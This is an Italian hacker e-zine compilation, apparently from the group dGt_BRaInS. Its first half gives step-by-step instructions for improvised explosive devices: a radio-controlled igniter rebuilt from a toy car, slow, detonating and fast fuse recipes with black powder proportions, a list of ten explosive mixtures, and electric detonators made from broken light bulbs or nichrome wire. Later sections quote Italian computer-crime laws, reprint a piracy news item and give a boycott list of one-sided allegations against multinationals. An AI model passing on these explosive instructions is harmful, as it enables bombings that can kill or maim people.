La polvere nera può essere fatta esplodere per semplice
accensione a mezzo di una miccia; per gli altri esplosivi
(salvo casi particolari in cui può bastare un forte calore)
occorre un mezzo d'innesco che normalmente è il detonatore;
esso è costituito da un tubicino metallico chiuso da un lato
e contenente una miscela di esplosivi primari. In alcuni casi,
specie usando esplosivi poco sensibili, nel detonatore è
contenuto, sotto a quello primario, anche uno strato di
esplosivo secondario molto potente; in altri casi il detonatore
viene collegato ad un separato detonatore secondario costituito
da un quantitativo variabile da pochi grammi fino ad un chilo
di esplosivo potente (Pentrite, T4, TNT).


}ACCENDITORE{

L'accenditore e' un congegno meccanico, chimico o
elettrico, idoneo a far reagire l'innesco.

}INVOLUCRO CONTENITORE{

L'ordigno esplosivo viene depositato in un involucro
che spesso e' costituito da scatole, valigie...

Accenditore e involucro contenitore possono anche mancare.
Il funzionamento dell'ordigno esplosivo, in genere, si puo'
scomporre cosi':
L'accenditore fa detonare l'innesco...
...la detonazione dell'innesco si propaga all'esplosivo...
....ha luogo la reazione esplosiva.

---

Bibliografia:
Gli Esplosivi, Hoepli
Tecnica degli esplosivi, Bianco
Impiego degli esplosivi, Bianco
Ricettario Industriale, Hoepli

---

Per maggiori informazioni sugli esplosivi vi consiglio di
leggere l'articolo di Jackal66 apparso sullo scorso numero.

---Cyborg--- [dGt_BRaInS]



-=!!!|-b00m rAdi0k0mAnDatI-|!!!=-

Autore: LeoNEr0

Avete mai pensato alla comodita' di un dispositivo che consente l'accensione
di esplosivi via radio? Si? Allora vi spiego come fare...
Avete mai sentito parlare di razzimodellismo? E' un hobby che conta migliaia
di persone in tutto il mondo. In cosa consiste? Nel lanciare per aria, grazie
a delle cariche di propellente, modelli di razzi. Ora, il propellente di
questi modelli, viene innescato con degli "accenditori", che non sono altro
che dei filamenti ricoperti di pirogeno. Per attivarli hanno bisogno di una
tensione di 12 o 6 volt. Per costruire il nostro radiocomando avremo bisogno
del sguente materiale:

- accenditori per razzimodellismo (dopo vi dico dove trovarli)

- una vecchia automobilina radiocomandata

- esplosivo in questione (ovvio...)

Allora, prendete l'automobilina e smembratela al fine di recuperare il
circuito di ricezione radio, il motore ed il vano batterie (attenzione a non
rompere i fili!). Una volta terminata questa operazione azionate il
radiocomando: il motore funziona? Bene, allora scollegate i fili
di alimentazione del motore e collegateci i terminali dell'accenditore.

Provate ad azionare il radicomando, l'accenditore dovrebbe incendiarsi!!! Per
rendere la cosa piu' facile, ai fili di alimentazione che vanno dal circuito
di ricezione all'accenditore saldate con lo stagno (non lo sapete fare?!?
Gravissimo!) due pinzette a coccodrillo, le quali saranno piu' semplici da
collegare all'accenditore. Adesso mettete l'accenditore all'interno
dell'esplosivo oppure a contatto con la miccia, allontanatevi, azionate il
radicomando e BOOOOOM!


Per quanto riguarda l'alimentazione del dispositivo di ricezione, non importa
che sia a 3, 6 o 9 volt, perche' queste tensioni vanno bene per il
funzionamento degli accenditori, ma dobbiamo assicurarci che le batterie siano
nuove per fornire la corrente necessaria. Gli accenditori li trovate presso la
ditta VOLO di Milano che effettua vendite per corrispondenza. L'indirizzo
di posta elettronica e': mc3314@mclink.it.

Vi cosiglio gli accenditori ESTES che costano 8500 lire 6 pezzi e funzionano
in teoria a 6 volt, ma sono molto flessibili e affidabili.

---LeoNErO---


-=!!!|-lE mIccE-|!!!=-

Autore: cYb0rG

}A COMBUSTIONE LENTA{

Materiale occorrente:
-Polvere nera flemmatizzata
-Tubicino impermeabile
-Siringa

Procedimento:
Preparate della polvere nera sfasando le proporzioni tra
salnitro (75%), carbone (15%) e zolfo (10%) portando il
salnitro all'80% e, di conseguenza, zolfo e carbone ciascuno
al 10%. Avete ottenuto della polvere nera flemmatizzata
ovvero, una polvere piu' lenta alla combustione (e' l'eccesso
di salnitro che provoca cio').
Aspirate con una siringa (senza ago) la polvere e versatela
all'interno di un tubicino impermeabile di gomma molla
(reperibile nei negozi di idraulica) fino a riempire del tutto
il tubo (sappiate che, se avrete fatto tutto bene, il tubicino
restera' comunque pieghevole anche con la polvere all'interno).

[CONTROLLO DELLA MICCIA A COMBUSTIONE LENTA]
-Verificate l'integrita' dell'involucro contenentie l'esplosivo;
-Verificate che la miccia non presenti alterazioni esterne;
-Verificate prima la velocita' effettiva di combustione
(un metro di miccia a lenta combustione dovrebbe bruciare
senza scoppietti, in un tempo compreso fra 110 e 150 secondi).

}DETONANTE{

Materiale occorrente:
-Una calza di fibra (colore giallo paglierino)
-Esplosivo detonante (pentrite, tnt o acido pirico)

Il procedimento consiste semplicemente (quasi come sopra)
nel riempire la calza di fibra con l'esplosivo.

[CONTROLLO DELLA MICCIA DETONANTE]
Oltre ai controlli utilizzati per la miccia precedente,
dovrete verificare l'integrita' dei singoli spezzoni: gli
spezzoni che presentano lesioni o sensibili piegature devono
essere scartati.

}ORDINARIA{

Materiale occorrente:
-delle corde vecchie, dei lacci di scarpe...
-del salnitro
-un pentolino
-un fornello (meglio se elettrico)
-dell'acqua

Procedimento:
Versate dell'acqua in un pentolino e con un cucchiaio
versategli anche del salnitro (circa il 5% dell'acqua).
Mettete nel pentolino le corde e i lacci precedentemente
cercati. Mettete il tutto a bollire per una decina di
minuti. Dopo aver fatto bollire i tutto estraete le corde
dal pentolino, torcetele e allungatele. Fatele seccare
all'aperto in un posto non eccessivamente caldo (meglio se
all'ombra).

}A COMBUSTIONE RAPIDA{

Materiale occorrente:
-Cartine (quelle per rollare ;)
-Zolfo (va bene anche quello delle teste di cerini)

Procedimento:
Se avete dei cerini tagliategli le teste e mettetele sulla
cartina (occorrono per una cartina piccola circa 20 teste),
meglio ancora se avete dello zolfo, potete versarne un po'
sulla cartina. Lo zolfo deve essere posto in modo uniforme
al centro della cartina e che dovete tracciarne una linea,
senza lasciare spazi in mezzo. Se non sapete rollare, potete
seguire il seguente schema:
______________________ ______________________
1. | | 2. | |
| | | |
|----------------------| |zzzzzzzzzzzzzzzzzzzzzz|
| | | |
|______________________| |______________________|
______________________ ______________________
3. | | 4. |______________________|
|______________________|

+---------+
z zolfo
+---------+

Ricordate che lo zolfo non fa molto bene all'organismo umano
quindi vi sconsiglio di aspirarlo o di leccare la cartina per
chiuderla, basta leccarsi un dito e poi passarvelo.

---Cyborg---- [dGt_BRaInS]


-=!!!|-10 gRanDi mIsCelE eSpl0sIvE-|!!!=-

Traduzione di: m4l3f1k0 [dGt_BRaInS]

!DISCLAIMER!L'autore di kuesto file non si prende responsabilità delle azioni
del lettore, e non incoraggia il lettore a fare gli esplosivi menzionati in
questo file, è illegale, ed è anche molto stupido e pericoloso. Questo file è a
a puro scopo informativo. Divertiti e non impazzire!
-Op Ivy(ricorda che niente è illegale finchè non vieni preso!)


10 GRANDI MISCELE ESPLOSIVE

1)Perclorato di potassio e canna da zucchero
2)Nitrato di sodio e solfuro di fluoro
3)Bicromato di potassio e solfato di Antimonio
4)Nitrato di Guanidina e Antimonio polverizzato
5)Permanganato di potassio e zucchero polverizzato
6)Clorato di Bario e paraffina
7)Clorito di sodio e Alluminio polverizzato (non sono sicuro su kuest'ultimo)
8)Perclorato di magnesio e canna da zucchero
9)Nitrato di Ammonio (puro più del 40%) e Benzina (MOLTO POTENTE)
10)Perossido di sodio e fiori di solfuro

---(m4l3f1k0)--- [dGt_BRaInS]

-=!!!|-i dEt0nAt0rI-|!!!=-

Autore: cYb0rG [dGt_BRaInS]

}DETONATORE A MICCIA{

Si realizza inserendo in un bossolotto metallico, forato
ad un'estremita', una miccia. Il bossolotto deve essere prima
riempito, naturalmente, con dell'esplosivo molto sensibile al
calore.

[CONTROLLO DEL DETONATORE A MICCIA]
-Osservate se il bossolotto presenta segni di deterioramento
o di danneggiamento e non esitate a scartarlo;
-Non introducete la miccia nel bossolotto con movimenti rotatori;
-Inserite la miccia con delicatezza

}DETONATORE ELETTRICO{

Puo' essere costituito, primitivamente, da una comune
lampadina elettrica (da poche volt) col vetro esterno
rotto e con una carica di esplosivo sensibile al calore
posta all'interno di essa. Il tutto e' semplicissimo,
occorre poco tempo e materiale poco costoso:
-una lampadina da poche volt
-del filo elettrico
-una batteria per alimentare il circuito (meglio se alimentato
da 6v che sviluppino una potenza di 5 watt e che eroghino
circa 2 ampere)
-un interruttore
-la carica esplosiva (ovvio!)
Basta realizzare un seplice circuito per alimetare la
lampadina et voila'!
_
______(x)______
| ^ |
| |
| ___
| -
| |
|_____/ ._______|

(Consiglio per rompere il vetro della lampadina senza
danneggiare la molla interna di riscaldare un punteruolo
con un accendino e di poggiarlo sul vetro che, si buchera'.
Poi inserite con una siringa senza ago la carica esplosiva
all'interno stando attenti che la carica venga a contatto
con la molla interna della lampadina e che la molla non si
rompa). Si puo' (al posto della lampadina) usare una
semplice resistenza elettrica che per effetto del passagio
di corrente si riscalda fino a raggiungere la temperatura di
accensione della carica. La resistenza la potete 'costruire'
con del filo abbastanza corto (5 cm max) e sottile di
nichel-cromo che attraversato dalla corrente elettrica
diventera' incandescente (il filo di nichel-cromo riesce a
sopportare temperature notevoli senza fondere), non dovrete
fare altro che piegare il filo come nella seguente figura:

_8_
/ \
| |
_.' '._

Dopo aver piegato il filo dovrete metterlo a contatto con
una carica esplosiva e inserirlo nel circuito.
(Anche se ovvio) In entrambi i casi per detonare l'esplosivo
non dovrete far altro che azionare l'interruttore.

[CONTROLLO DEL DETONATORE ELETTRICO]
-Assicuratevi che i contatti del circuito siano saldi e
perfettamente integri;
-Potete utilizzare, per una maggiore sicurezza, anche due
o piu' interruttori nello stesso circuito;
-'Scaricate' continuamente eventuali cariche elettrostatiche
che vi si accumulano addosso. Per scaricare l'elettricita'
statica basta toccare frequentemente il terreno o meglio
ancora un metallo.

>PRECAUZIONI VARIE<
Mantenete nel brillamento di piccole cariche esplosive
la distanza di sicurezza di almeno 50 metri, in caso
di cariche maggiori la distanza di sicurezza oscilla
dai 50 metri (se l'esplosivo e' all'aperto) ai 100 metri
(se la carica esplosiva e' interrata) mentre, per cariche
demolitrici all'aperto la distanza e' di almeno 300 metri
(nel caso che la demolizione colpisca legname, alberi,
roccia, muratura) o di 900/1500 metri (nel caso colpisca
cemento armato o strutture metalliche).
In caso di mancata esplosione del vostro ordigno artigianale
occorre attendere non meno di 30 minuti prima di avvicinarsi
ad esso. Ricordate che piu' tempo passa dalla mancata esplosione
e meglio e'. La prudenza non e' mai troppa, sappiate che e' in
gioco la vostra vita e basta poco per trapassare la carne umana!

---Cyborg--- [dGt_BRaInS]


######################################
#+----------++----------++----------+#
#| aNti.c0p || aNti.c0p || aNti.c0p |#
#+----------++----------++----------+#
######################################

-=!!!|-ArTiCoLi "InTeReSsAnTi" DaL cOdIcE PeNaLe-!!!|=-

Autore: cYb0rG [dGt_BRaInS]

420. Attentato a impianti di pubblica utilita'.
Chiunque commetteun fatto diretto a danneggiare o distruggere impianti
di pubblica utilita', e' punito, salvo che il fatto non costitusca piu'
grave reato, con la reclusione da uno a quattro anni. La pena di cui al
primo comma si applica anche a chi commette un fatto diretto a danneggiare
o distruggere sistemi informatici o telematici di pubblica utilita',
ovvero dati, informazioni o programmi in essi contenuti o ad essi
pertinenti. Se dal fatto deriva la distruzione o il danneggiamento dell'
impianto o del sistema, dei dati, delle informazioni o dei programmi
ovvero l'interruzzione anche parziale del funzionamento dell'impianto o del
sistema la pena e' della reclusione da tre a otto anni.

615ter. Accesso abusivo ad un sistema informatico o telematico
Chiunque abusivamente si introduce in un sistema informatico o
telematico protetto da misure di sicurezza ovvero vi si mantiene
contro la volonta' espressa o tacita di chi ha il diritto di
escluderlo, e' punito con la reclusione fino a tre anni.
La pena e' della reclusione da uno a cinque anni:
1)...
2)...
3)se dal fatto deriva la distruzione o il danneggiamento del
sistema o l'interruzione totale o parziale del suo funzionamento,
ovvero la distruzione dei dati, delle informazioni o dei programmi
in esso contenuti.

615quater. Detenzione e diffusione abusiva di codici di accesso a sistemi
informatici o telematici.
Chiunque, al fine di procurare a se' o ad altri un profitto o di
arrecare ad altri un danno, abusivamente si procura, riproduce,
diffonde, comunica o consegna codici, parole chiave o altri mezzi
idonei all'accesso ad un sistema informatico o telematico, protetto
da misure di sicurezza, o comunque fornisce indicazioni o istruzioni
idonee al predetto scopo, e' punito con la reclusione sino a un anno
e con la multa sino a lire dieci milioni. La pena e' della reclusione
da uno a due anni e della multa da lire dieci milioni a venti milioni
se ricorre taluna delle circostanze di cui ai numeri 1) e 2) del
quarto comma dell'articolo 617quater.

615quinquies. Diffusione di programmi diretti a danneggiare o interrompere
un sistema informatico.
Chiunque diffonde, comunica o consegna un programma informatico da
lui stesso o da altri redatto, avente per scopo o per efetto il
danneggiamento di un sistema informatico o telematico, dei dati o
dei programmi in esso contenuti o ad esso pertinenti, ovvero
l'interruzione, totale o parziale, o l'alterazione del suo funzionamento,
e' punito con la reclusione sino a due anni e con la multa sino a lire
venti milioni.

617. Cognizione, interruzione o impedimento illeciti di comunicazioni o
conversazioni telegrafiche o telefoniche.
Chieunque, fraudolentemente, prende cognizione di una comunicazione o
di una conversazione, telefoniche o telegrafiche, tra altre persone
o comunque a lui non dirette, ovvero le interrompe o le impedisce
è punito con la reclusione da sei mesi a quattro anni.(...)

617bis. Installazone di apparecchiature atte ad intercettare od impedire
comunicazioni o conversazioni telegrafiche o telefoniche.
Chiunque, fuori dai casi consentiti dalla legge, installa apparati,
strutture, parti di apparati o di strumenti al fine di intercettare od
impedire comunicazioni o conversazioni telegrafiche o telefoniche tra
altre persone e' punito con la reclusione da uno a quattro anni.(...)

617ter. Falsificazione, alterazione o soppressione del contenuto si
comunicazioni o conversazioni telegrafiche o telefoniche.
Chiunque, al fine di procurare a se' o ad altri un vantaggio o di recare
ad altrui un danno, forma falsamente, in tutto o in parte, il testo di una
conversazione telegrafica o telefonica ovvero altera o sopprime in tutto o
in parte, il contenuto di una comunicazione o di una conversazione
telegrafica o telefonica vera, anche solo occasionalmente intercettata,
e' punito, qualora
ne faccia uso o lasci che altri ne faccia uso, con la reclusione da uno a
quattro anni.(...)

617quater. Inercettazione, impedimento o interruzione illecita di
comunicazioni informatiche o telematiche.
Chiunque fraudolentemente intercetta comunicazioni relative a un sistema
informatico o telematico o intercorrenti tra piu' sistemi, ovvero le
impedisce o le interrompe, e' punito con la reclusione da sei mesi a
quattro anni.(...)

617quinquies. Installazione di apparecchiature atte ad intercettare, impedire
o interrompere comunicazioni informatiche o telematiche.
Chiunque, fuori dai casi consentiti dalla legge, installa apparecchiature
atte a intercettare, impedire o interrompere comunicazioni relative a un
sistema informatico o telematico ovvero intercorrenti tra piu' sistemi, e'
punito con la reclusione da uno a quattro anni.(...)

621. Rivelazione del contenuto di documenti segreti.
Chiunque, essendo venuto abusivamente a cognizione del contenuto, che debba
rimanere segreto, di altrui atti o documenti, pubblici o privati, non
costituenti corrispondenza, lo rivela, senza giusta causa, ovvero l'impiega
a proprio o altrui profitto, e' punito, se dal fatto deriva nocumento, con
la reclusione fino a tre anni o con la multa da lire duecentomila a due
milioni. Agli effetti della disposizione di cui al primo comma e'
considerato documentoanche qualunque supporto informatico contenente dati,
informazioni o programmi. Il delitto e' punibile a querela della persona
offesa.

635bis. Danneggiamento di sistemi informatici e telematici.
Chiunque distrugge, deteriora o rende, in tutto o in parte, inservibili
sistemi informatici o telematici altrui, ovvero programmi,informazioni o
dati altrui, e' punito, salvo che il fatto non costituisca piu' grave reato,
con la reclusione da sei mesi a tre anni.(...)

640ter. Frode Informatica.
Chiunque, alterando in qualsiasi modo il funzionamento di un sistema
informatico o telematico o intervenendo senza diritto con qualsiasi
modalita' su dati, informazioni o programmi contenuti in un sistema
informatico o telematico o ad esso pertinenti, procura a se' o ad altri un
ingiusto profitto con altrui danno, e' punito con la reclusione da sei mesi
a tre anni e con la multa da lire centomila a due milioni.(...)

---CyBoRg--- [dGt_BRaInS]

-=!!!|-Pirateria: copiare software non é reato-|!!!=-

Rubato da: Libertari Mailing List (Libertari@onelist.com)

Una sentenza di un giudice torinese chiude la strade del penale per chi
ha
copiato software ad uso personale o per la propria azienda. Una
decisione
storica

Pirateria: copiare software non é reato

21/04/00 - News - Torino - Ha sollevato immediato clamore sulla rete la
sentenza con cui un tribunale del capoluogo piemontese ha stabilito che
duplicare software non é reato se non lo si fa per commerciare le copie
prodotte. In altre parole, chi utilizza software copiati per uso
personale o
all'interno della propria azienda va incontro a possibili richieste di
risarcimento da parte delle case produttrici di programmi ma non deve
temere
la galera.

Si tratta di una sentenza storica perchè riporta la pirateria su un binario
secondo molti più congruo con l'effettività gravità dell'atto del
copiare uno o più programmi.

La sentenza é scaturita dal caso di un imprenditore di Torino trovato in
possesso, nella sua azienda, di una serie piuttosto ampia di software
professionale "piratato", cioé riprodotto da copie dell'originale.
All'imprenditore veniva contestato un articolo, ben noto agli esperti della
materia, di una normativa che risale al 1941 sul diritto d'autore, in cui si
evidenzia la punibilità della violazione "a fini di lucro". "Ma in questo
caso, ha detto uno degli avvocati dell'imprenditore, si può parlare di
profitto ingiusto solo se il software riprodotto abusivamente viene
immesso nel mercato"
.

La sentenza sostanzia una giurisprudenza che riporta su un piano di
equità i toni spesso eccessivi utilizzati da chi persegue la pirateria.
Ancora non sono note in questo senso le reazioni della Business Software
Alliance, che da anni chiede pene severissime per chi copia programmi, al di
là del loro successivo utilizzo.

---Libertari ML---


-=!!!|-HoW tO bOyCoTt-|!!!=-

Autori: cYb0rG-OldDrake [dGt_BRaInS]

Ecco delle righe che riassumeranno in breve cosa poter 'combinare' contro le
multinazionali [premetto, anche se è ovvio, che le multi hanno soldi a palate
e voi non farete altro che poco ai loro patrimoni ma, è pur sempre qualcosa].

*Ethic*
Alcune delle multinazionali che sfruttano la natura (alzando il tasso di
inquinamento) e sottopagano i loro lavoratori dei paesi del secondo, terzo
e quarto mondo sono:

McDonald's
Shell
Walt Disney
Nike
Mitsubishi
Nestle'
Coca Cola
Philip Morris
Benetton
Adidas
Del Monte (Royal)
Johnson & Johnson
Dow Henkel
Parmalat
Fiat (gruppo Agnelli)
Fininvest
Montedison
Reebok
Unilever
Novartis
L' Oreal
Pepsi Cola
Philip Morris
Kimberly Clark
Procter & G.
Sun Diamond
Total
Barilla
ABF
Chiquita
Bayer

queste sono solo alcune, la lista [purtroppo] è quasi infinita, a noi
non resta altro che boicottarle in modo da far venir meno loro dei proventi
e danneggiarlee direttamente o indirettamente. Ricordo inoltre che catene
come McDonald's non fanno altre che impedire la crescita dei nostri piccoli
negozianti, facendo fallire le buon vecchie paninerie locali che si vedono
schiacciate da questi colossi della globalizzazione che offrono scarsa
qualità della merce a un costo finale infimo ma, non dimentichiamo che lo
pagano indirettamente i piccoli negozianti e direttamente la natura e i paesi
sottosviluppati dei quali impediscono lo sviluppo. Vogliono fare del mondo un
villaggio globale dovo ci vogliono tutti omologati ai loro modelli
(distruggendo etnie, fauna, flora e ogni diversita' che rende 'originale' ed unico
l'essere umano), schiacciando subdolamente i nostri pensieri e rendendoci
impotenti al loro dominio ci vogliono tutti nel loro apocalittico progetto
che ci vede come tante bambole tutte uguali che ripetono le stesse parole, ci
vogliono schiavi del Grande Fratello, vogliono che non pensiamo piu' per
poter distinguere il bello dal brutto, vogliono che loro siano il bello,
vogliono che noi compriamo i loro prodotti perche' hanno gia' attuato un
lavaggio globale delle menti nei paesi capitalisti dove <se non hai le scarpe
firmate, stai fuori>. Compriamo cose di cui non abbiamo realmente bisogno e
facciamo accrescere i loro capitali, loro controllano il mondo: ribbelliamoci!!



*Know-how*
Informazioni sulle multinazionali più famose e più grosse del mondo
ed in particolare presenti sul mercato italiano.

McDonald's
Catena di fast food americana presente in oltre 100 paesi con più di ventimila
ristoranti. In questi anni sono state messe in atto numerose campagne
di boicottaggiocontro questa multinazionale:
1. Per lo sfruttamento del lavoro. I salari sono bassi e gli straordinari non
sono pagati in maniera regolare.
2. La McDonald's ha ammesso di aver utilizzato bovini allevati su terre che
prima erano coperte da foreste tropicali, impedendo di fatto la loro
rigenerazione.

3. Ogni anno la McDonald's utilizza migliaia di tonnellate di imballaggi
inutili, la gran parte dei quali finisce per strada e nelle discariche come
inquinanti.

3. Nei paesi poveri, vasti appezzamenti di terreno sono utilizzati per la
coltivazione di derrate alimentari necessari alla sopravvivenza dei popoli
locali. Bisogna ricordare che ci vogliono sette tonnellate di granaglie per
produrne una di carne.

5. I menu utilizzati all' interno dei fast food si basano sullo sterminio di
milioni di animali, gran parte dei quali allevati in maniera intensiva.

6. Il cibo servito da McDonald's danneggia la salute perché è ricco di grassi,
zucchero e sale, mentre è povero di fibre e vitamine.



Nike
Indizzo: Nike Corporation One Bowermann, Drive Deverton, OR 97005, USA.

In indonesia, nelle fabbriche che producono per la multinazionale Nike, gli
operai lavorano 270 ore al mese e sono pagati meno di 64.000 lire. Questa
somma, anche se corrisponde al salario minimo stabilito dal governo, copre
appena il 31% dei bisogni vitali di una famiglia di quattro persone.
Naturalmente stiamo parlando delle paghe degli adulti, i bambini prendono
molto meno.
La paga media di un bambino, che lavora otto ore al giorno per sei giorni alla
settimana, è di 30.000 al mese. Per questo è accusata di sfruttamento del lavoro
minorile.


Shell
Indirizzo: Shell International Petroleum Co LTD, Shell Centre London SE1 7MA.

La multinazionale anglo olandese Shell ha ammesso di aver acquistato, diversi
anni fa, armi per dotare la polizia nigeriana dell' equipaggiamento necessario
alla difesa dei propri impianti petroliferi.
Le compagnie petrolifere operanti in Nigeria, tra le quali Shell,
Elf Aquitaine, Chevron, Mobil, Texano, e le società del nostro paese Agip,
Saipem ed Enel, sono responsabili della distruzione ambientale e delle
violazioni dei diritti umani.

In Nigeria, la Shell è stata accusata dal popolo Ogoni di aver rovinato il suo
territorio (una regione ricca pr la pesca e per la coltivazione) con fuoriscite
di petrolio, e di aver finanzioato il governo per reprimere gli abitanti che
volenvano fermare il disastro ecologico.


Walt Disney
Sede centrale: Walt Disney Company, 500 Suth Buona Vista Street,
Burbank CA 91521, USA.
Sede italiana: The Walt Disney Co. Italia, Via S. Sandri 1, 20121, Milano,
fax 02/29085349.

Attività: produzione di filmati, ideazione di personaggi ed atività editoriali, mostre
ricreative, attività edilizie, concessonarie di marchi e personaggi brevettati.
Ad Haiti, a 5.500 Km di distanza dai suoi begli uffici californiani, migliaia
di giovani lavoratrici, poco più che quindicenni, lavorano alla confezione di
abbigliamento a marchio Walt Disney per uno stipendio di circa 27 centesimi
(circa 430 lire) l' ora. In queste fabbriche non sono rispettate le norme di
sicurezza sul lavoro. Le operaie lavorano 8-10 ore al giorno nel numore più
assordante. La pausa pranzo è di soli 10 minuti. Non sono rispettati i diritti
sanitari e sindacali, e le operaie sono vittime di percosse, molestie e
violenze da parte dei guardiani.

Il guio di Haiti è che i salari sono da Terzo mondo mentre il costo della vita
è da Primo. Lo stipendio di una giornata basta a malapena a consentire alle
operaie di mantenersi in vita e di prendere l' autobus per recarsi al lavoro.
Negli USA è iniziata una campagna nei confronti della Disney. Ad organizzarla
è la National Labor Commitee [15 Union Square, New York, NY10003,
fax 001/212/2423821] che si occupa di tutela dei diritti delle popolazioni
del Sud del mondo.Charles Kemaghan, direttore dell' organizzazione, precisa
di non voler assolutamente li ritiro della Disney da Haiti, ma chiede che la
retribuzione dia portata a 920 lire l' ora.


Mitsubishi
La Mitsubishi è boicottata perché è la più grande compagnia giapponese che
abbatte e commercia legno tropicale proveniente dalle foreste asiatiche e
sudamericane. Le operazioni di disboscamento procedono ininterrottamente
24 ore su 24 e solo in Malesia distruggono 300.000 ettari all' anno.


Nestlè
Indirizzo: Nestlè SA, Avenue Nestlè 55, CH-1800 Vevey, Svizzera.

E' presente con i seguenti marchi: Acqua brillante Recoaro, Gingerino Recoaro,
Lora Recoaro, After Height, Alemagra, Antica gelateria del Corso,
Bella Napoli, Buitoni, Beltè, Berni, Buitoni, Perugina, Cacao Perugina,
Le ore liete Perugina, Capuccino, Cheerios, Chinò, Chocapic, Cioccoblocco,
Condipasta, Condiriso, Diger Seltz, Dorè, Ecco... Franck, Fiorello,
Fontelipia, Fruttolo, Galak, Kit Kt,
Gold Krisp, Guigoz, King, La Cremeria Motta, La Valle degli Orti, Le ore liete
Perugina, Levissima, Limpia, Lingotto, Locatelli, Maggi, Malto, Kneipp,
Mare Fresco, Miglioli, Mio Locatelli, Mio Nestlè Yougurt, Mirage, Motta (gelati),
Nescafè, Nesquik Cereali, Nestea, Nestè, Nestum, One-O-One, Orzoro, Panna,
Pejo, Perrie, Pezzullo, Pizzaiola Locatelli, Quality Street, Recoaro, Rowntree
Macintosh, Sanbernardo, Sanpellegrino, Sanbitter, Sasso, Surgelo, Trio,
Ulmeta, Vera, Vismara, Voglia di Pizza, Nestlè ha anche la licenza di commercio
dell' acqua Fiuggi.
Alcune sue caratteristiche:

1. Oltre che esserenil principale produttore del latte in polvere, controlla
fra il 35 e il 50% del mercato mondiale, è la maggiore società agro-alimentare
del mondo.

2. Trasgredisce sotto molti aspetti il codice OMS (Organizzazione Mondiale
della Sanità) sul latte in polvere nel Sud del mondo. Promuove l' uso del
latte in polvere attraverso la pubblicità, gli sconti sugli acquisti e la
distribuzione di campioni gratuiti sia al personale sanitario che alle madri,
favorendo quindi l' insuccesso dell' allattamento naturale, così che il
bambino viene a dipendere dal latte artificiale. Comperare il latte può
costare più della metà dell' intero reddito famigliare.
Le madri sono costrette a diluire il latte in palvere e questo porta alla
malnutrizione.
Infine l' acqua che serve a diluire il latte è spesso malsana, ciò causa
diarrea, disidratazione e morte di un milione e mezzo di bambini ogni anno,
come denuncia l' UNICEF.

3. E' uno dei più grandi coomercianti e distributori di caffè e cacao,
pertanto è uno dei massimi responsabili delle gravi condizioni in cui versano
milioni di contadini del sud del mondo, a causa dei suoi metodi commerciali
totalmente ispirati alla logica del profetto.
E' in corso un boicottaggio internazionale coordinato da Baby Milk Action per
indurla a sospendere la violazione del codice di regolamentazione commerciale
elaborato dell' OMS in materia di latte in polvere.

Cola Cola
Indirizzo: Coca Cola Company, One Coca-Plaza/PO Drawer 1734, Georgia 30
Atlanta, USA.

1. Nel 1985 ha comprato duecentomila acri di foresta tropicale in Belize per
piantare limoni ed arance

2. Ha una forte collaborazione con la Nestlè.

3. Negli impianti di imbottigliamento in India fa uso del lavoro minorile.

4. In Italia avrebbe pagato duecento milioni di lire al ministro della Sanità,
allora Francesco de Lorenzo, per facilitare la messa in commercio
della bevanda "Light", quella dietetica, che secondo le norme italiane era
sconsigliata ai bambini e alle donne incinte.

Philip Morris
Indirizzo principale: Philip Morris Companies, 120 Park Avenue, NY 10017
New York, USA.

1. Nel 1994 Philp Morris ha speso 25 miliardi di lire per fare eliminare
negli Stati Uniti le disposizioni prese dai singoli Stati e farle sostituire
da una legge federale più accondiscendente.

2. È uno dei più grandi commercianti e trasforatore del mondo di caffè
e cacao. Pertanto è uno dei massimi responsabili delle gravi condizioni
in cui versano milioni di contadini nel Sud del mondo perché i suoi metodi
commerciali, totalmente ispirati ad una logica di profitto, non garantiscono
guadagni dignitosi ai piccoli produttori.

3. Esercitando potenti pressioni sul governo americano è riuscita a far
adottare ritorsioni commerciali contro tutti i paesi che tentano di ostacolare
l' ingresso di sigarette straniere. Dalla seconda metà degli anni 80, il
consumo di tabacco tra i minorenni dei paesi del sud del mondo è aumentato in
misura impressionante.


Parmalat
Indirizzo principale: Parmalat finanziaria, Via O. Grassi 26, 43044
Collecchio PR.

È presente con i seguenti marchi: Bonlat, Chef, Corradini, Dietalat, Giglio,
Kyr Parmalat, La Frutta, Mister Day, Oro Centrale, Parmalat, Pizza Pronto
forno, Plasmon, Pomì Weight Watchers (latte), Tea Food, Tettamanti, Vecchio
Forno.
Secondo il CUT (maggiore sindacato brasiliano) la Parmalat, in Brasile,
tenta di annientare i suoi concorrenti locali con metodi sleali, basati
sull' abbassamento transitorioper dei prezzi; fa fallire i contadini che non
accettano di produrre per lei attraverso una serie di scorrettezzeattuate
da parte delle imprese che hanno in appalto il servizio di raccolta latte.
Il prezzo da pagare ai contadini è fissato da Parmalat.


Fininvest
Indirizzo: Fininvest S.p.A., Milano 2, Palazzo Donatello, 20090, Segrote,
Milano.

È un gruppo impegnato in 6 settori: edilizia, grande distribuzione, publicità,
sport e spettacolo, finanza ed assicurazioni, editoria. Possiede la catena di
distribuzione STANDA.
Oltre che a Canale 5, Italia 1, Rete 4: le tre reti Mediaset, Fininvest
possiede il "Giornale", Tv Sorrisi e Canzoni, Panorama e l' Arnoldo Mondatori
Editore. La magistratura sta indagando se attraverso dei prestanome controlla
anche Telepiù. La lista degli arrestati e delle indagini giudiziarie a carico
dei dirigenti della Fininvest è molto lunga.


Barilla
Indirizzo: G. e R. F.lli Spa, Via Mantova 166, 43100 Parma.

In Italia è l' impresa leader nei settori della pasta, dei biscotti, delle
fette boscottate, dei crackers, delle merendine e dei sughi pronti. È presente
con i seguenti marchi: Barilla, Crackers Motta, Essere, Gran Pavesi,
le Tre Marie, le Spighe Mulino Bianche, Pavesini, Voiello, Panem.
All' interno del consiglio di amministrazionedel Barilla siede Walter
Wulth, presidente della multinazionale svizzera Oerlikon Buhrle, una
delle maggiori aziende europee di armi pesanti (blindati, cannoni, missili).


Montedison
Indirizzo: Montedison, Foro Bonaparte 31, 20121, Milano.

È presente con i seguenti marchi: Carapelli, Cereol, Delizie, Eridania,
Friggi, Giglio Oro, Hoc, Lara, Le Macine, Ligustro, Oro Verde, Rustichella,
Sigillo, Teodora, Verdi Colli.
È un vasto gruppo multinazionale industriale, chimico ed agroalimentare.
Le attività di Montedison spaziano in molti settori, ma i principali sono
quello chimico, quello energetico e quello agroalimentare.
La Montedison è stata la protagonista dei peggiori casi d' inquinamento
italiani per mezzo della sua industria chimica, esempio il caso Farmoplant
di Massa, il caso Acna di Cengio, i fanghi rossi di Scarlino, il petrolchimico
di Marghera. È l' unica impresa italiana che produce sostanze "mangiaozono".
